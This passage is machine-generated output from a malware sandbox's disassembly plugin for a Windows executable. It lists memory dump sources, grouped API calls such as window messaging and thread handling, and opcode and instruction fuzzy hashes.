                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Show$Enable
                                                                            • String ID:
                                                                            • API String ID: 2939132127-0
                                                                            • Opcode ID: c489c8d02495f69c1778672d4edb055e6fea3c7ece5ab9feb79cbeb3e5804fe0
                                                                            • Instruction ID: 7b1a324bc3c797ad2cef2d534c40479af2ebf6dcc7ddf8e29c066732655267d0
                                                                            • Opcode Fuzzy Hash: c489c8d02495f69c1778672d4edb055e6fea3c7ece5ab9feb79cbeb3e5804fe0
                                                                            • Instruction Fuzzy Hash: 63513E2291978681EB71FB29D494A78BBA0EF84BD4FA94431CA4D076A4CF3DE453D720
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePostSleep$RectWindow
                                                                            • String ID:
                                                                            • API String ID: 3382505437-0
                                                                            • Opcode ID: eede7ce4c4e84a454966b5ad3a71d2882c358ebf9f1b03269eaebc827b2ba57d
                                                                            • Instruction ID: 999e4162fe0798978ec84af026c1415958de6d78caa0a14748e572f52f24618f
                                                                            • Opcode Fuzzy Hash: eede7ce4c4e84a454966b5ad3a71d2882c358ebf9f1b03269eaebc827b2ba57d
                                                                            • Instruction Fuzzy Hash: 3431D73660864547E720EF39E848A69B791FB88BE8F800235EE5D87795CE3CF8528714
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                            • String ID:
                                                                            • API String ID: 2256411358-0
                                                                            • Opcode ID: c134d4337344e0b5e6f60fa6ff3406e13c81d8ed9a5a6472cdeb4b0526b89ef4
                                                                            • Instruction ID: 041ba7857383c29f45a1c4275401046349c27415e470847413dcab7d4c22f5af
                                                                            • Opcode Fuzzy Hash: c134d4337344e0b5e6f60fa6ff3406e13c81d8ed9a5a6472cdeb4b0526b89ef4
                                                                            • Instruction Fuzzy Hash: EB416F21D0D68386FB70BB389848BB9AF90EF41BD4FD80136D54D469A5CF2CE4578721
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$BuffCharUpperVisibleWindowwcsstr
                                                                            • String ID:
                                                                            • API String ID: 2655805287-0
                                                                            • Opcode ID: ffa12279a6d5d294ec943fc537edc99c80ddfe1fbe564970008d60d8cc28f79c
                                                                            • Instruction ID: 2a699b259ea21166830f0138a7d373626eed3750f82a0684fa18b3de7f35d283
                                                                            • Opcode Fuzzy Hash: ffa12279a6d5d294ec943fc537edc99c80ddfe1fbe564970008d60d8cc28f79c
                                                                            • Instruction Fuzzy Hash: 7421C922B0978245EB24EB329915679AAA0FF89FE0FC44570EE5D47795DE3CD462C310
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ObjectSelect$BeginCreatePath
                                                                            • String ID:
                                                                            • API String ID: 3225163088-0
                                                                            • Opcode ID: 8abe7a71c66bee896d504cb3d5ab816aa1492e552a9085df695a80683d63dbe3
                                                                            • Instruction ID: 0c790b8fbbd764c92bd1467b77829783c9100e4c77f52c6e5fae46878118a144
                                                                            • Opcode Fuzzy Hash: 8abe7a71c66bee896d504cb3d5ab816aa1492e552a9085df695a80683d63dbe3
                                                                            • Instruction Fuzzy Hash: E3315E31A187469AF760BB29A840739FBA0FB847E0F950135D94D47754CF7CE4A28B20
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                                                                            • String ID:
                                                                            • API String ID: 2067211477-0
                                                                            • Opcode ID: 6c75004fdc8f89f48edb4038dcc6ab145b99058f26a8cd052d9a22877b7c3d52
                                                                            • Instruction ID: 54448df4e98ab108529528e5ff752aed02b0a9933f8f7c6669797595b0d2363d
                                                                            • Opcode Fuzzy Hash: 6c75004fdc8f89f48edb4038dcc6ab145b99058f26a8cd052d9a22877b7c3d52
                                                                            • Instruction Fuzzy Hash: 73215325E09F82A5EE24FB75941497DEB90AF84BD4F848531EA4D43755DF3CE4228620
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: _set_statfp
                                                                            • String ID:
                                                                            • API String ID: 1156100317-0
                                                                            • Opcode ID: e270cafaa1c1bb403facffb31b6a836e27aa4e45b093d38abbba4bbe7c8013ef
                                                                            • Instruction ID: 98c635a826f4c5cef916f62a8d730c98c46f2b9d05cf7923708c2f6ca166c089
                                                                            • Opcode Fuzzy Hash: e270cafaa1c1bb403facffb31b6a836e27aa4e45b093d38abbba4bbe7c8013ef
                                                                            • Instruction Fuzzy Hash: 0311E326E1CE0325F674313AE442B759C427F453F9F89E630EA6E466DACE1CE8638120
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Initialize__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_initialize_onexit_tables_invalid_parameter_noinfo_onexit_set_fmode
                                                                            • String ID:
                                                                            • API String ID: 2117695475-0
                                                                            • Opcode ID: c6240938d00ce931eff62a9f8efb7c75b2bc90d30c2bcb96158b33b23c092f9e
                                                                            • Instruction ID: 83887cbb41ea5fe8987ae0fe1f239f63221f5b34f465ce4b38ed36c05d8482f1
                                                                            • Opcode Fuzzy Hash: c6240938d00ce931eff62a9f8efb7c75b2bc90d30c2bcb96158b33b23c092f9e
                                                                            • Instruction Fuzzy Hash: BA118A00E0C54765FA3873B15457ABCAE924F843C1FC444B8E91E9A2C7EE1CB8B74232
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 3897988419-0
                                                                            • Opcode ID: c2625648870bea748c00488204de808f07a4ef133cb019afb6ef5a542de6e20a
                                                                            • Instruction ID: a584e101fe6009732155c7c10009329bcc3aea001e0f907f8b649a9fc29d9bd8
                                                                            • Opcode Fuzzy Hash: c2625648870bea748c00488204de808f07a4ef133cb019afb6ef5a542de6e20a
                                                                            • Instruction Fuzzy Hash: 61113065708A51C7E720AB36E840729ABA4FF85BC0F984134DE4D47758DF3DE8528710
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                            • String ID:
                                                                            • API String ID: 2833360925-0
                                                                            • Opcode ID: e93a488e7ef773f4239d39afdac6f2cad4444a29d3dd75f0fed3b9e62e675ca8
                                                                            • Instruction ID: da841de7de33007b4b37a81c5938300965dc1f2681bb6bd4bf67a86cd2bfab8b
                                                                            • Opcode Fuzzy Hash: e93a488e7ef773f4239d39afdac6f2cad4444a29d3dd75f0fed3b9e62e675ca8
                                                                            • Instruction Fuzzy Hash: E001D420A08A0282EB29BB31A895939EB60BF957C0BD40635E11FD1564DF2CE4E6C630
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(?,?,?,00007FF7978929AD,?,?,?,00007FF797842AB2), ref: 00007FF7978B003C
                                                                            • TerminateThread.KERNEL32(?,?,?,00007FF7978929AD,?,?,?,00007FF797842AB2), ref: 00007FF7978B0047
                                                                            • WaitForSingleObject.KERNEL32(?,?,?,00007FF7978929AD,?,?,?,00007FF797842AB2), ref: 00007FF7978B0055
                                                                            • ~SyncLockT.VCCORLIB ref: 00007FF7978B005E
                                                                              • Part of subcall function 00007FF7978AF7B8: CloseHandle.KERNEL32(?,?,?,00007FF7978B0063,?,?,?,00007FF7978929AD,?,?,?,00007FF797842AB2), ref: 00007FF7978AF7C9
                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00007FF7978929AD,?,?,?,00007FF797842AB2), ref: 00007FF7978B006A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$CloseEnterHandleLeaveLockObjectSingleSyncTerminateThreadWait
                                                                            • String ID:
                                                                            • API String ID: 3142591903-0
                                                                            • Opcode ID: ba6bd7e5b15845e6b6bdca5424b03e7aeaa25a678f545ea5128a0138939c9a9e
                                                                            • Instruction ID: 0cbd01de32cd993e2acf78ff629f25681eb4a0e9e78a1156cb62490dfee0db15
                                                                            • Opcode Fuzzy Hash: ba6bd7e5b15845e6b6bdca5424b03e7aeaa25a678f545ea5128a0138939c9a9e
                                                                            • Instruction Fuzzy Hash: 42014C3AA18B4196E720AF25E440629B760FB98B90F504031DB8E43B65CF3CD4A3C750
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorExitLastThread
                                                                            • String ID:
                                                                            • API String ID: 1611280651-0
                                                                            • Opcode ID: 99fd53b48de60ad2b3b37300d72bcddb8f2580f530d7a1e219e10e2618182fab
                                                                            • Instruction ID: 0eb8a590302469e360aaae24e5caa4fe42eaf9f3e07b5e8732c047f285afd2cd
                                                                            • Opcode Fuzzy Hash: 99fd53b48de60ad2b3b37300d72bcddb8f2580f530d7a1e219e10e2618182fab
                                                                            • Instruction Fuzzy Hash: D2014411F08A42A2EA247B30984853CAA61FF40BF5FD09735C63E026D6DF3CE9768310
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                            • String ID:
                                                                            • API String ID: 2625713937-0
                                                                            • Opcode ID: c45599d3bc9fc7debef7ab567c3c0eb4022d53e70f819905b21d88790cde579c
                                                                            • Instruction ID: 241eadc142b748e59db758c063a7313488efabe11e842d68b8c2823f2d779d6c
                                                                            • Opcode Fuzzy Hash: c45599d3bc9fc7debef7ab567c3c0eb4022d53e70f819905b21d88790cde579c
                                                                            • Instruction Fuzzy Hash: A2012121E0C64BA5F7757B39ED94738AB61FF45BE4F994130C52D066A0CF7DA0A68320
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                            • String ID:
                                                                            • API String ID: 179993514-0
                                                                            • Opcode ID: e2ae8e70be2f5b84d83463abcc11da4b251e2e09d7ca6408d5f9779cbd984f2d
                                                                            • Instruction ID: c814551008f660ab953b9018e0a0783780ee64529b9e49d6f27034888b1f584f
                                                                            • Opcode Fuzzy Hash: e2ae8e70be2f5b84d83463abcc11da4b251e2e09d7ca6408d5f9779cbd984f2d
                                                                            • Instruction Fuzzy Hash: CAF06D10F1860242FB783BB27C58E789A567F487D1FC45030C90A47295EE7DA4FB8670
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                            • String ID:
                                                                            • API String ID: 179993514-0
                                                                            • Opcode ID: 3c9aaefa71688af513bcff76e9269722b622f20c654f000aa95846671475ad7f
                                                                            • Instruction ID: 66f4bacd254e9ea1d6598d91dca1a5274e566eeec2d9dc7bde3a8305f0e5e828
                                                                            • Opcode Fuzzy Hash: 3c9aaefa71688af513bcff76e9269722b622f20c654f000aa95846671475ad7f
                                                                            • Instruction Fuzzy Hash: 70F03010F2861282FB3837B56C58A749B517F887D5FC45030C80E46251EE3D94B78670
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: _invalid_parameter_noinfo
                                                                            • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                            • API String ID: 3215553584-1196891531
                                                                            • Opcode ID: 77144706097a283061aa6841737fd5fc45152d0aa2c4d7c8d9b1e627f9bd4a8a
                                                                            • Instruction ID: b56aa2e5a9be15770af9b9ff3d2eca9a6929e1c0deaa4b82afc9c9b20d330626
                                                                            • Opcode Fuzzy Hash: 77144706097a283061aa6841737fd5fc45152d0aa2c4d7c8d9b1e627f9bd4a8a
                                                                            • Instruction Fuzzy Hash: 8581A072E2C20285FF756F359540A79AEA0AF117C4FD48035DA0F5B790EB6CA8B2D231
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: _invalid_parameter_noinfo
                                                                            • String ID: $*
                                                                            • API String ID: 3215553584-3982473090
                                                                            • Opcode ID: db61ebb86adcfd651309e33ba306c402ee314aa11931134a2a7a81ecab3a0501
                                                                            • Instruction ID: 5e601f4f37d104527f3ac6c0435aebaa25d6ee12c17f5c3f39fabca2efc5bc24
                                                                            • Opcode Fuzzy Hash: db61ebb86adcfd651309e33ba306c402ee314aa11931134a2a7a81ecab3a0501
                                                                            • Instruction Fuzzy Hash: 4861A43290C2428AE775AF348445BBCBFE8FB21B98FD411B5C64A51599EF2CE463C721
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: _set_statfp
                                                                            • String ID: !$acos
                                                                            • API String ID: 1156100317-2870037509
                                                                            • Opcode ID: 0d89aa78777a41b63d954a76095aee346a1dbdd639e7adc8a9fc006d5894d638
                                                                            • Instruction ID: fe5ca1412b41fbb3255159488f00bc1b301016c2ef4a2c1cf53530701b0ed556
                                                                            • Opcode Fuzzy Hash: 0d89aa78777a41b63d954a76095aee346a1dbdd639e7adc8a9fc006d5894d638
                                                                            • Instruction Fuzzy Hash: 9B61D821E28F8688E233AB345815776EF54BFA63D0F91C336E91E35A64DF2DE0934610
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: _set_statfp
                                                                            • String ID: !$asin
                                                                            • API String ID: 1156100317-2188059690
                                                                            • Opcode ID: dda4458e7c1e859fb838f80da50bdd89987d805c8091ebd73b4f99c53429eb29
                                                                            • Instruction ID: c543cebe40406ca99548f4f4b2ab4b90d9dc88d390975940e56a7f0a713a88bd
                                                                            • Opcode Fuzzy Hash: dda4458e7c1e859fb838f80da50bdd89987d805c8091ebd73b4f99c53429eb29
                                                                            • Instruction Fuzzy Hash: 5C61FB21D28F8685E263EB349815776DB64BF963D0F90C332E95E35965DF1CF0534610
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
